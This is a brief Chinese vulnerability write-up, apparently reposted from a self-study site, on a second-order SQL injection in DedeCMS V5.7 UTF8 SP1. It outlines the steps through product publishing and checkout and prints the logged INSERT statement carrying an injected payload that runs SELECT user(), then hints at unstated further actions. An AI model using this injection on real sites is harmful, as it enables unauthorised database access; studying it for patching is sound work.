注册会员,然后跳到商品发布处,如图所示:
发布出去,然后自己对此进行测试,跳到购买页面,放入购物车进行付款测试,如图所示:
然后点击下一步,提交,后台监控到 数据库 的sql语句为:
INSERT INTO `dede_shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`) VALUES ('135','S-P1401859090RN948','5','',0,0),(NULL,NULL,char(@`'`),(SELECT user()),0,0)#,(1,','0.00','1')
然后去数据库查看,此语句是否正常执行,如图所示:
后面要做进一步的动作,大家都懂得,这里就不多说了......
查看更多关于DedeCMS-V5.7-UTF8-SP1 sql二次注入 - 网站安全 - 自学的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did15402